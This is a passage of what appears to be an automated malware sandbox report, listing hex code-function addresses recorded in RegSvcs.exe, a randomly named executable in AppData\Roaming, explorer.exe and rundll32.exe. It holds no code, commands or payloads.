Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01186000	7_2_01186000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0114E3F0	7_2_0114E3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011C02C0	7_2_011C02C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01140535	7_2_01140535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011965B2	7_2_011965B2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011965D0	7_2_011965D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01164750	7_2_01164750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01140770	7_2_01140770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0115C6E0	7_2_0115C6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01156962	7_2_01156962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0114A840	7_2_0114A840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01178890	7_2_01178890
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011268F1	7_2_011268F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011328F0	7_2_011328F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116E8F0	7_2_0116E8F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01142A45	7_2_01142A45
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0113EA80	7_2_0113EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0114AD00	7_2_0114AD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0114ED7A	7_2_0114ED7A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01158DBF	7_2_01158DBF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01148DC0	7_2_01148DC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01140C00	7_2_01140C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01130CF2	7_2_01130CF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01160F30	7_2_01160F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01182F28	7_2_01182F28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B4F40	7_2_011B4F40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011BEFA0	7_2_011BEFA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01132FC8	7_2_01132FC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01140E59	7_2_01140E59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01152ED9	7_2_01152ED9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0112F172	7_2_0112F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0117516C	7_2_0117516C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0114B1B0	7_2_0114B1B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011433F3	7_2_011433F3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011452A0	7_2_011452A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0115D2F0	7_2_0115D2F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01143497	7_2_01143497
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011874E0	7_2_011874E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0114B730	7_2_0114B730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01149950	7_2_01149950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0115B950	7_2_0115B950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01131979	7_2_01131979
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011459DA	7_2_011459DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011AD800	7_2_011AD800
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011438E0	7_2_011438E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0115FB80	7_2_0115FB80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B5BF0	7_2_011B5BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0117DBF9	7_2_0117DBF9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B3A6C	7_2_011B3A6C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01143D40	7_2_01143D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0115FDC0	7_2_0115FDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B9C32	7_2_011B9C32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01159C20	7_2_01159C20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01141F92	7_2_01141F92
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01149EB0	7_2_01149EB0
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Code function: 8_2_051DD5DC	8_2_051DD5DC
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Code function: 8_2_07309668	8_2_07309668
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Code function: 8_2_07309658	8_2_07309658
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Code function: 8_2_07300400	8_2_07300400
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Code function: 8_2_073003F0	8_2_073003F0
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Code function: 8_2_073003C8	8_2_073003C8
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Code function: 8_2_07307E60	8_2_07307E60
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Code function: 8_2_07309ED8	8_2_07309ED8
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Code function: 8_2_07309AA0	8_2_07309AA0
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Code function: 8_2_07309A90	8_2_07309A90
Source: C:\Windows\explorer.exe	Code function: 9_2_0E396232	9_2_0E396232
Source: C:\Windows\explorer.exe	Code function: 9_2_0E395036	9_2_0E395036
Source: C:\Windows\explorer.exe	Code function: 9_2_0E38C082	9_2_0E38C082
Source: C:\Windows\explorer.exe	Code function: 9_2_0E390B30	9_2_0E390B30
Source: C:\Windows\explorer.exe	Code function: 9_2_0E390B32	9_2_0E390B32
Source: C:\Windows\explorer.exe	Code function: 9_2_0E393912	9_2_0E393912
Source: C:\Windows\explorer.exe	Code function: 9_2_0E38DD02	9_2_0E38DD02
Source: C:\Windows\explorer.exe	Code function: 9_2_0E3995CD	9_2_0E3995CD
Source: C:\Windows\explorer.exe	Code function: 9_2_104F8036	9_2_104F8036
Source: C:\Windows\explorer.exe	Code function: 9_2_104EF082	9_2_104EF082
Source: C:\Windows\explorer.exe	Code function: 9_2_104F0D02	9_2_104F0D02
Source: C:\Windows\explorer.exe	Code function: 9_2_104F6912	9_2_104F6912
Source: C:\Windows\explorer.exe	Code function: 9_2_104FC5CD	9_2_104FC5CD
Source: C:\Windows\explorer.exe	Code function: 9_2_104F9232	9_2_104F9232
Source: C:\Windows\explorer.exe	Code function: 9_2_104F3B32	9_2_104F3B32
Source: C:\Windows\explorer.exe	Code function: 9_2_104F3B30	9_2_104F3B30
Source: C:\Windows\explorer.exe	Code function: 9_2_1063C036	9_2_1063C036
Source: C:\Windows\explorer.exe	Code function: 9_2_10633082	9_2_10633082
Source: C:\Windows\explorer.exe	Code function: 9_2_10634D02	9_2_10634D02
Source: C:\Windows\explorer.exe	Code function: 9_2_1063A912	9_2_1063A912
Source: C:\Windows\explorer.exe	Code function: 9_2_106405CD	9_2_106405CD
Source: C:\Windows\explorer.exe	Code function: 9_2_1063D232	9_2_1063D232
Source: C:\Windows\explorer.exe	Code function: 9_2_10637B32	9_2_10637B32
Source: C:\Windows\explorer.exe	Code function: 9_2_10637B30	9_2_10637B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_00401026	13_2_00401026
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_00401030	13_2_00401030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0041EB5E	13_2_0041EB5E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0041E53C	13_2_0041E53C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_00402D89	13_2_00402D89
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_00402D90	13_2_00402D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0041DDB4	13_2_0041DDB4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_00409E60	13_2_00409E60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0041DF38	13_2_0041DF38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0041D7FE	13_2_0041D7FE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_00402FB0	13_2_00402FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01240100	13_2_01240100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_012EA118	13_2_012EA118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_012D8158	13_2_012D8158
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_013041A2	13_2_013041A2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_013101AA	13_2_013101AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_013081CC	13_2_013081CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_012E2000	13_2_012E2000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0130A352	13_2_0130A352
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0125E3F0	13_2_0125E3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_013103E6	13_2_013103E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_012F0274	13_2_012F0274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_012D02C0	13_2_012D02C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01250535	13_2_01250535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01310591	13_2_01310591
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_012F4420	13_2_012F4420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01302446	13_2_01302446
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_012FE4F6	13_2_012FE4F6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01250770	13_2_01250770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01274750	13_2_01274750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0124C7C0	13_2_0124C7C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0126C6E0	13_2_0126C6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01266962	13_2_01266962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_012529A0	13_2_012529A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0131A9A6	13_2_0131A9A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01252840	13_2_01252840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0125A840	13_2_0125A840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_012368B8	13_2_012368B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0127E8F0	13_2_0127E8F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0130AB40	13_2_0130AB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01306BD7	13_2_01306BD7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0124EA80	13_2_0124EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0125AD00	13_2_0125AD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_012ECD1F	13_2_012ECD1F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01268DBF	13_2_01268DBF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0124ADE0	13_2_0124ADE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01250C00	13_2_01250C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_012F0CB5	13_2_012F0CB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01240CF2	13_2_01240CF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01292F28	13_2_01292F28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01270F30	13_2_01270F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_012F2F30	13_2_012F2F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_012C4F40	13_2_012C4F40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_012CEFA0	13_2_012CEFA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0125CFE0	13_2_0125CFE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01242FC8	13_2_01242FC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0130EE26	13_2_0130EE26
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01250E59	13_2_01250E59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0130CE93	13_2_0130CE93
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01262E90	13_2_01262E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0130EEDB	13_2_0130EEDB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0128516C	13_2_0128516C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0123F172	13_2_0123F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0131B16B	13_2_0131B16B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0125B1B0	13_2_0125B1B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0130F0E0	13_2_0130F0E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_013070E9	13_2_013070E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_012FF0CC	13_2_012FF0CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_012570C0	13_2_012570C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0130132D	13_2_0130132D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0123D34C	13_2_0123D34C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0129739A	13_2_0129739A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_012552A0	13_2_012552A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_012F12ED	13_2_012F12ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0126B2C0	13_2_0126B2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01307571	13_2_01307571
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_012ED5B0	13_2_012ED5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_013195C3	13_2_013195C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0130F43F	13_2_0130F43F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01241460	13_2_01241460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0130F7B0	13_2_0130F7B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01295630	13_2_01295630
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_013016CC	13_2_013016CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_012E5910	13_2_012E5910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01259950	13_2_01259950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0126B950	13_2_0126B950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_012BD800	13_2_012BD800
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_012538E0	13_2_012538E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0130FB76	13_2_0130FB76
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0126FB80	13_2_0126FB80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0128DBF9	13_2_0128DBF9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_012C5BF0	13_2_012C5BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_012C3A6C	13_2_012C3A6C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01307A46	13_2_01307A46
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0130FA49	13_2_0130FA49
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_012EDAAC	13_2_012EDAAC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01295AA0	13_2_01295AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_012F1AA3	13_2_012F1AA3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_012FDAC6	13_2_012FDAC6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01307D73	13_2_01307D73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01253D40	13_2_01253D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01301D5A	13_2_01301D5A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0126FDC0	13_2_0126FDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_012C9C32	13_2_012C9C32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0130FCF2	13_2_0130FCF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0130FF09	13_2_0130FF09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0130FFB1	13_2_0130FFB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01251F92	13_2_01251F92
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01213FD2	13_2_01213FD2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01213FD5	13_2_01213FD5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01259EB0	13_2_01259EB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04CFE4F6	15_2_04CFE4F6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04D02446	15_2_04D02446
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04CF4420	15_2_04CF4420
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04D10591	15_2_04D10591
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C50535	15_2_04C50535
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C6C6E0	15_2_04C6C6E0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C4C7C0	15_2_04C4C7C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C74750	15_2_04C74750
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C50770	15_2_04C50770
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04CE2000	15_2_04CE2000
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04D081CC	15_2_04D081CC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04D041A2	15_2_04D041A2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04D101AA	15_2_04D101AA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04CD8158	15_2_04CD8158
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C40100	15_2_04C40100
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04CEA118	15_2_04CEA118
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04CD02C0	15_2_04CD02C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04CF0274	15_2_04CF0274
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C5E3F0	15_2_04C5E3F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04D103E6	15_2_04D103E6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04D0A352	15_2_04D0A352
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C40CF2	15_2_04C40CF2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04CF0CB5	15_2_04CF0CB5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C50C00	15_2_04C50C00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C4ADE0	15_2_04C4ADE0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C68DBF	15_2_04C68DBF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C5AD00	15_2_04C5AD00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04CECD1F	15_2_04CECD1F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04D0EEDB	15_2_04D0EEDB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04D0CE93	15_2_04D0CE93
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C62E90	15_2_04C62E90
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C50E59	15_2_04C50E59
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04D0EE26	15_2_04D0EE26
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C42FC8	15_2_04C42FC8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C5CFE0	15_2_04C5CFE0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04CCEFA0	15_2_04CCEFA0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04CC4F40	15_2_04CC4F40
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C92F28	15_2_04C92F28
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C70F30	15_2_04C70F30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04CF2F30	15_2_04CF2F30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C7E8F0	15_2_04C7E8F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C368B8	15_2_04C368B8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C52840	15_2_04C52840
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C5A840	15_2_04C5A840
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C529A0	15_2_04C529A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04D1A9A6	15_2_04D1A9A6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C66962	15_2_04C66962
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C4EA80	15_2_04C4EA80
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04D06BD7	15_2_04D06BD7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04D0AB40	15_2_04D0AB40
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04C41460	15_2_04C41460
